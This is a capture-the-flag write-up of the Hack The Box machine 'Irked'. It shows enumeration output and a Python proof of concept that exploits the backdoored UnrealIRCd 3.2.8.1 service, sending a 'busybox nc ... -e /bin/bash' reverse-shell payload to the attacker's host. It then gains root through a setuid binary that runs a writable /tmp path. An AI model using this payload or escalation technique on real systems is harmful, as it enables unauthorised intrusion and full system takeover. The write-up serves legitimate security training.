HTB: Irked¶
Spoiler Summary
This Linux box is running a backdoored ircd. PE is possible via a poorly secured setuid binary.
Services¶
TCP¶
nmap TCP scan:
# Nmap 7.94SVN scan initiated Fri Jun 28 13:41:24 2024 as: nmap -v -sCV -p- -T4 --min-rate 10000 -oN nmap_tcp t
Warning: 10.10.10.117 giving up on port because retransmission cap hit (6).
Nmap scan report for t (10.10.10.117)
Host is up (0.100s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33795/udp6 status
| 100024 1 44609/udp status
| 100024 1 53976/tcp status
|_ 100024 1 54469/tcp6 status
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
53976/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
80/tcp-http¶
The site:
$ curl http://irked.htb
<img src=irked.jpg>
<br>
<b><center>IRC is almost working!</b></center>
6697/tcp-irc¶
Irssi v1.4.5 - https://irssi.org
13:48 -!- Irssi: Looking up irked.htb
13:48 -!- Irssi: The following settings were initialized
13:48 real_name
13:48 -!- Irssi: Connecting to irked.htb [10.10.10.117] port 6697
13:48 Waiting for CAP LS response...
13:48 -!- Irssi: Connection to irked.htb established
13:48 !irked.htb *** Looking up your hostname...
13:48 !irked.htb *** Couldn't resolve your hostname; using your IP address instead
13:48 -!- Welcome to the ROXnet IRC Network kali!kali@10.10.14.10
13:48 -!- Your host is irked.htb, running version Unreal3.2.8.1
13:48 -!- This server was created Mon May 14 2018 at 13:12:50 EDT
13:48 -!- irked.htb Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
13:48 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307
KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 are supported by this server
13:48 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG
NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ are supported by this server
13:48 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
13:48 -!- There are 1 users and 0 invisible on 1 servers
13:48 -!- I have 1 clients and 0 servers
13:48 -!- Current Local Users: 1 Max: 1
13:48 -!- Current Global Users: 1 Max: 1
13:48 -!- MOTD File is missing
13:48 -!- Mode change [+iwx] for user kali
13:48 -!- You may not reregister
The Unreal3.2.8.1 version of ircd has an RCE backdoor.
tcp/111-rpcbind¶
$ sudo nmap -sSUC -p 111 t
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-28 14:31 CST
Nmap scan report for t (10.10.10.117)
Host is up (0.099s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33795/udp6 status
| 100024 1 44609/udp status
| 100024 1 53976/tcp status
|_ 100024 1 54469/tcp6 status
111/udp open rpcbind
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33795/udp6 status
| 100024 1 44609/udp status
| 100024 1 53976/tcp status
|_ 100024 1 54469/tcp6 status
Nmap done: 1 IP address (1 host up) scanned in 15.34 seconds
$ rpcinfo irked.htb
program version netid address service owner
100000 4 tcp6 ::.0.111 portmapper superuser
100000 3 tcp6 ::.0.111 portmapper superuser
100000 4 udp6 ::.0.111 portmapper superuser
100000 3 udp6 ::.0.111 portmapper superuser
100000 4 tcp 0.0.0.0.0.111 portmapper superuser
100000 3 tcp 0.0.0.0.0.111 portmapper superuser
100000 2 tcp 0.0.0.0.0.111 portmapper superuser
100000 4 udp 0.0.0.0.0.111 portmapper superuser
100000 3 udp 0.0.0.0.0.111 portmapper superuser
100000 2 udp 0.0.0.0.0.111 portmapper superuser
100000 4 local /run/rpcbind.sock portmapper superuser
100000 3 local /run/rpcbind.sock portmapper superuser
100024 1 udp 0.0.0.0.174.65 status 107
100024 1 tcp 0.0.0.0.210.216 status 107
100024 1 udp6 ::.132.3 status 107
100024 1 tcp6 ::.212.197 status 107
RCE¶
Here's a modified version of this PoC:
import socket
ip="10.10.10.117"
port=6697
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
a=s.recv(1024)
a=b"AB;busybox nc 10.10.14.10 443 -e /bin/bash"
s.sendall(a)
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.117] 38035
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
PE¶
First, I'll check for setuid executables:
ircd@irked:~$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount
The view /usr/bin/viewuser stands out as atypical.
ircd@irked:~$ file /usr/bin/viewuser
/usr/bin/viewuser: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=69ba4bc75bf72037f1ec492bc4cde2550eeac4bb, not stripped
ircd@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2024-06-28 15:40 (:0)
ircd pts/1 2024-06-28 16:23 (10.10.14.10)
ircd pts/2 2024-06-28 17:08 (10.10.14.10)
sh: 1: /tmp/listusers: not found
It's calling /tmp/listusers which doesn't exist. Since I can write to that directory, I can put /bin/sh there for a shell.
ircd@irked:~$ cp /bin/sh /tmp/listusers
ircd@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2024-06-28 15:40 (:0)
ircd pts/1 2024-06-28 16:23 (10.10.14.10)
ircd pts/2 2024-06-28 17:08 (10.10.14.10)
# id
uid=0(root) gid=1001(ircd) groups=1001(ircd)
Open Questions¶
I got lost down a deep rpcbind rabbit hole. Is there something there?
Credits¶
I missed the setuid binary on my first pass, and spent two hours researching rpcbind. This writeup from snowscan is a little outdated--it looks like HTB changed the box since it was written, e.g. /home/djmardov/.backup no longer exists. But, it still helped point me in the right direction for PE.